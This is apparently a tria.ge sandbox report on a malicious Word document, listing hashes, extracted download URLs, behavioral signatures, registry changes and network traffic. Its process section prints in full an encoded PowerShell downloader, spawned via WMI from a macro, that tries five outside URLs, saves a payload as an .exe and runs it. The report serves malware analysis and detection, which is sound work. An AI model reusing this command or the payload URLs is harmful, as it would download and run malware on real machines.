Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
21/11/2024, 00:28 UTC
Behavioral task
behavioral1
Sample
f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc
Resource
win10v2004-20241007-en
General
-
Target
f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc
-
Size
168KB
-
MD5
75bd4b0063bd857bcab72e088adca30e
-
SHA1
585a121ffbab437dd9043b87e2ace950842e5a06
-
SHA256
f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0
-
SHA512
19b7666676481f8dd4edfd68f3b4b1df66536e6fd8e05ea5373c4375f00796dad8b2f8d1fa6d9ecb42bfacee8e0685b4845f937968fe32e9dd08d16e52cdd0ee
-
SSDEEP
3072:64PrXcuQuvpzm4bkiaMQgAlS8ll4TKCpJynpr7RT:7DRv1m4bnQgIS8lFnpr7RT
Malware Config
Extracted
http://houseofgriffin.org/weblog/v76/
http://hohwy.com/cgi-bin/Bv8y33Cmr/
http://lidermuebles.com.ar/cgi-bin/wz4rxd/
http://106.52.87.250:81/wp-admin/T3B09Z/
http://duhocjk.vn/wp-admin/51f73u/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2100 2876 powersheLL.exe 32 -
Blocklisted process makes network request 5 IoCs
flow pid Process 5 2100 powersheLL.exe 7 2100 powersheLL.exe 9 2100 powersheLL.exe 11 2100 powersheLL.exe 12 2100 powersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5DBF3FFF-D8F2-49D8-A935-9533E887F8D5}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib\{5DBF3FFF-D8F2-49D8-A935-9533E887F8D5}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5DBF3FFF-D8F2-49D8-A935-9533E887F8D5}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib\{5DBF3FFF-D8F2-49D8-A935-9533E887F8D5}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2572 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2100 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2100 powersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2572 WINWORD.EXE 2572 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2572 wrote to memory of 1668 2572 WINWORD.EXE 30 PID 2572 wrote to memory of 1668 2572 WINWORD.EXE 30 PID 2572 wrote to memory of 1668 2572 WINWORD.EXE 30 PID 2572 wrote to memory of 1668 2572 WINWORD.EXE 30
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABkAGEAbwBoAGoAbwB1AHQAaAB3AG8AaQB6AD0AJwBoAGUAYQBtAGgAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBgAGkAVABZAFAAUgBgAG8AdABvAGMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAawBpAG8AZABtAG8AYQBnACAAPQAgACcAOAA1ADEAJwA7ACQAeABhAGkAdAB4AGEAdQBnAHYAYQBlAHgAcgBvAGkAYwBoAD0AJwB2AGUAZQBwAGIAbwBvAGYAcABvAG8AcQB1ACcAOwAkAGoAZQBvAGwAdwBhAGkAcQB1AGoAbwB1AGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGsAaQBvAGQAbQBvAGEAZwArACcALgBlAHgAZQAnADsAJABnAGUAdQBjAHQAaABhAHUAZABnAHUAcgBoAGUAdQBkAD0AJwBiAG8AbwBqAGgAaQBsAHQAaABlAGkAYgAnADsAJABrAGUAdQBwAGYAYQBpAGsAdABoAHUAdQBzAD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAFcAZQBCAEMAbABpAGUAbgBUADsAJABtAGEAbwBnAHoAbwBlAGcAYwBoAHUAdQBrAD0AJwBoAHQAdABwADoALwAvAGgAbwB1AHMAZQBvAGYAZwByAGkAZgBmAGkAbgAuAG8AcgBnAC8AdwBlAGIAbABvAGcALwB2ADcANgAvACoAaAB0AHQAcAA6AC8ALwBoAG8AaAB3AHkALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBCAHYAOAB5ADMAMwBDAG0AcgAvACoAaAB0AHQAcAA6AC8ALwBsAGkAZABlAHIAbQB1AGUAYgBsAGUAcwAuAGMAbwBtAC4AYQByAC8AYwBnAGkALQBiAGkAbgAvAHcAegA0AHIAeABkAC8AKgBoAHQAdABwADoALwAvADEAMAA2AC4ANQAyAC4AOAA3AC4AMgA1ADAAOgA4ADEALwB3AHAALQBhAGQAbQBpAG4ALwBUADMAQgAwADkAWgAvACoAaAB0AHQAcAA6AC8ALwBkAHUAaABvAGMAagBrAC4AdgBuAC8AdwBwAC0AYQBkAG0AaQBuAC8ANQAxAGYANwAzAHUALwAnAC4AIgBTAGAAcABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAGMAdQB1AGQAYgB1AGEAaABkAGkAbwBtAD0AJwB3AG8AdwB0AGkAYQB2AG4AdQBhAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAbwBpAG4AbABlAGUAcgB4AHUAbgAgAGkAbgAgACQAbQBhAG8AZwB6AG8AZQBnAGMAaAB1AHUAawApAHsAdAByAHkAewAkAGsAZQB1AHAAZgBhAGkAawB0AGgAdQB1AHMALgAiAEQAbwBgAHcAbgBsAGAAbwBhAGAAZABGAEkATABFACIAKAAkAGIAbwBpAG4AbABlAGUAcgB4AHUAbgAsACAAJABqAGUAbwBsAHcAYQBpAHEAdQBqAG8AdQBkACkAOwAkAGQAdQBhAHcAcQB1AG8AbwB0AGMAaABpAGEAdwA9ACcAawBpAGEAZgBsAGEAaQBkAGwAYQBlAGsAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABqAGUAbwBsAHcAYQBpAHEAdQBqAG8AdQBkACkALgAiAEwAYABFAG4AZwB0AGgAIgAgAC0AZwBlACAAMwAzADYAMQA4ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAZQBgAEEAdABlACIAKAAkAGoAZQBvAGwAdwBhAGkAcQB1AGoAbwB1AGQAKQA7ACQAaABhAHUAYwBqAGEAaQB4AGsAbwBhAHcAZgBlAHUAagA9ACcAawBlAG8AagB4AHUAYwAnADsAYgByAGUAYQBrADsAJAB3AGkAYQBuAG0AYQBjAGgAdABvAGMAZABvAG8AagA9ACcAZwBlAGUAbQBsAGkAaAB6AGUAYQBiACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHEAdQBhAGIAcQB1AGEAaQBjAGgAcABhAHcAPQAnAGIAbwBlAHgAdgBlAGEAeAB4AGkAeQAnAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
Network
-
Remote address:8.8.8.8:53Requesthouseofgriffin.orgIN AResponsehouseofgriffin.orgIN A74.114.89.87
-
Remote address:74.114.89.87:80RequestGET /weblog/v76/ HTTP/1.1
Host: houseofgriffin.org
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: Apache
Vary: Accept-Encoding,Cookie
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
TT-Server: t=1732148930595180 D=24839
Location: http://www.houseofgriffin.org/weblog/v76/
Content-Length: 0
Keep-Alive: timeout=10, max=20
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestwww.houseofgriffin.orgIN AResponsewww.houseofgriffin.orgIN A74.114.89.87
-
Remote address:74.114.89.87:80RequestGET /weblog/v76/ HTTP/1.1
Host: www.houseofgriffin.org
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding,Cookie
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.houseofgriffin.org/wp-json/>; rel="https://api.w.org/"
TT-Server: t=1732148931019768 D=34652
Keep-Alive: timeout=10, max=20
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requesthohwy.comIN AResponsehohwy.comIN A81.169.145.77
-
Remote address:81.169.145.77:80RequestGET /cgi-bin/Bv8y33Cmr/ HTTP/1.1
Host: hohwy.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.62 (Unix)
Vary: User-Agent
Last-Modified: Wed, 27 Jul 2022 11:55:26 GMT
ETag: "128a-5e4c817b6c780"
Accept-Ranges: bytes
Content-Length: 4746
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html
-
Remote address:8.8.8.8:53Requestlidermuebles.com.arIN AResponselidermuebles.com.arIN A172.67.194.140lidermuebles.com.arIN A104.21.92.141
-
Remote address:172.67.194.140:80RequestGET /cgi-bin/wz4rxd/ HTTP/1.1
Host: lidermuebles.com.ar
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 21 Nov 2024 01:28:51 GMT
Location: https://lidermuebles.com.ar/cgi-bin/wz4rxd/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNYTa06kjEfMu9zGaJWYzEVf0m9tgVVwSDtukTnTrZbiJeCgbMisaJVmmxvX%2BooJS2%2BINYkWf1rd7C7XdZkg69RGhbNK%2FbSfXGe5onrwDaYf3FDIFlgdKDj2T8n%2FmcTdE%2BtIGcNQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5c8fe70d12ef2b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=39071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=84&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
-
Remote address:172.67.194.140:443RequestGET /cgi-bin/wz4rxd/ HTTP/1.1
Host: lidermuebles.com.ar
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding,Cookie,User-Agent
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://lidermuebles.com.ar/wp-json/>; rel="https://api.w.org/"
Location: https://lidermuebles.com.ar/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eM5ukKPeYbwsXc3AITazLVMVe5tXHQm7ilLiGX0N4Gn%2BLeznJLZx0AbqgrRVLAGJpXQme%2Bc8S9CYTVA%2FDpUoVUUBd7EceLcqQUssBOEsj9iYeIhSkBG6Me5bFRi5UW2R86gHN66l"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5c8fea6df97777-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51542&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=374&delivery_rate=81238&cwnd=253&unsent_bytes=0&cid=4a2e65ab43fe9ee0&ts=1699&x=0"
-
Remote address:172.67.194.140:443RequestGET / HTTP/1.1
Host: lidermuebles.com.ar
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: max-age=3, must-revalidate
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=983aaw2hCtTxrrAL%2FYYVCPrIKWWcbvv%2FdMQ9%2FeRUgnHJhG7gqC4pAznES%2FnShXiDmX9Q%2F%2Bm3FiIKLq%2FRwmyttCf9c9OCeyjTa5aW2VcmZ5cWmkNygkVnO1gJXimj1VfOMc7Lg7jV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5c8ff43d6e7777-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50158&sent=8&recv=7&lost=0&retrans=0&sent_bytes=3927&recv_bytes=459&delivery_rate=81238&cwnd=254&unsent_bytes=0&cid=4a2e65ab43fe9ee0&ts=1986&x=0"
-
309 B 575 B 5 3
HTTP Request
GET http://houseofgriffin.org/weblog/v76/HTTP Response
301 -
865 B 33.4kB 17 26
HTTP Request
GET http://www.houseofgriffin.org/weblog/v76/HTTP Response
404 -
353 B 5.3kB 6 6
HTTP Request
GET http://hohwy.com/cgi-bin/Bv8y33Cmr/HTTP Response
200 -
314 B 1.2kB 5 3
HTTP Request
GET http://lidermuebles.com.ar/cgi-bin/wz4rxd/HTTP Response
301 -
2.1kB 62.5kB 35 58
HTTP Request
GET https://lidermuebles.com.ar/cgi-bin/wz4rxd/HTTP Response
302HTTP Request
GET https://lidermuebles.com.ar/HTTP Response
200
-
64 B 80 B 1 1
DNS Request
houseofgriffin.org
DNS Response
74.114.89.87
-
68 B 84 B 1 1
DNS Request
www.houseofgriffin.org
DNS Response
74.114.89.87
-
55 B 71 B 1 1
DNS Request
hohwy.com
DNS Response
81.169.145.77
-
65 B 97 B 1 1
DNS Request
lidermuebles.com.ar
DNS Response
172.67.194.140104.21.92.141